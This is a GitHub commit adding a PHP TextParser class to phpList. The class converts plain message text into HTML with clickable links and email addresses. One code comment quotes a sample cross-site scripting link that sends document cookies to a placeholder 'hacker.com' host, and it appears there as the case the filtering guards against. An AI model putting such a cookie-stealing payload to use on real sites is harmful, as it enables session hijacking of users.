Skip to content

Commit 759d8e0

Browse files
committed
TextParser
1 parent 613a196 commit 759d8e0

File tree

1 file changed

+73
-0
lines changed

1 file changed

+73
-0
lines changed
Lines changed: 73 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,73 @@
1+
<?php
2+
3+
declare(strict_types=1);
4+
5+
namespace PhpList\Core\Domain\Messaging\Service;
6+
7+
class TextParser
8+
{
9+
public function __invoke(string $text): string
10+
{
11+
// bug in PHP? get rid of newlines at the beginning of text
12+
$text = ltrim($text);
13+
14+
// make urls and emails clickable
15+
$text = preg_replace("/([\._a-z0-9-]+@[\.a-z0-9-]+)/i", '<a href="mailto:\\1" class="email">\\1</a>', $text);
16+
$link_pattern = "/(.*)<a.*href\s*=\s*\"(.*?)\"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is";
17+
18+
$i = 0;
19+
while (preg_match($link_pattern, $text, $matches)) {
20+
$url = $matches[2];
21+
$rest = $matches[3];
22+
if (!preg_match('/^(http:)|(mailto:)|(ftp:)|(https:)/i', $url)) {
23+
// avoid this
24+
//<a href="javascript:window.open('http://hacker.com?cookie='+document.cookie)">
25+
$url = preg_replace('/:/', '', $url);
26+
}
27+
$link[$i] = '<a href="'.$url.'" '.$rest.'>'.$matches[4].'</a>';
28+
$text = $matches[1]."%%$i%%".$matches[5];
29+
++$i;
30+
}
31+
32+
$text = preg_replace("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i", 'http://\\1', $text); //make www. -> http://www.
33+
$text = preg_replace("/(https?:\/\/)http?:\/\//i", '\\1', $text); //take out duplicate schema
34+
$text = preg_replace("/(ftp:\/\/)http?:\/\//i", '\\1', $text); //take out duplicate schema
35+
$text = preg_replace("/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i",
36+
'<a href="\\1\\2" class="url" target="_blank">\\2</a>',
37+
$text); //eg-- http://kernel.org -> <a href"http://kernel.org" target="_blank">http://kernel.org</a>
38+
39+
$text = preg_replace("/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@!\\-_]+)/i",
40+
'<a href="\\1\\2\\3" class="url" target="_blank">\\2\\3</a>',
41+
$text); //eg -- http://www.google.com -> <a href"http://www.google.com" target="_blank">www.google.com</a>
42+
43+
// take off a possible last full stop and move it outside
44+
$text = preg_replace("/<a href=\"(.*?)\.\" class=\"url\" target=\"_blank\">(.*)\.<\/a>/i",
45+
'<a href="\\1" class="url" target="_blank">\\2</a>.', $text);
46+
47+
for ($j = 0; $j < $i; ++$j) {
48+
$replacement = $link[$j];
49+
$text = preg_replace("/\%\%$j\%\%/", $replacement, $text);
50+
}
51+
52+
// hmm, regular expression choke on some characters in the text
53+
// first replace all the brackets with placeholders.
54+
// we cannot use htmlspecialchars or addslashes, because some are needed
55+
56+
$text = str_replace("\(", '<!--LB-->', $text);
57+
$text = str_replace("\)", '<!--RB-->', $text);
58+
$text = preg_replace('/\$/', '<!--DOLL-->', $text);
59+
60+
// @@@ to be xhtml compabible we'd have to close the <p> as well
61+
// so for now, just make it two br/s, which will be done by replacing
62+
// \n with <br/>
63+
// $paragraph = '<p class="x">';
64+
$br = '<br />';
65+
$text = preg_replace("/\r/", '', $text);
66+
$text = preg_replace("/\n/", "$br\n", $text);
67+
68+
// reverse our previous placeholders
69+
$text = str_replace('<!--LB-->', '(', $text);
70+
$text = str_replace('<!--RB-->', ')', $text);
71+
return str_replace('<!--DOLL-->', '$', $text);
72+
}
73+
}

0 commit comments

Comments
 (0)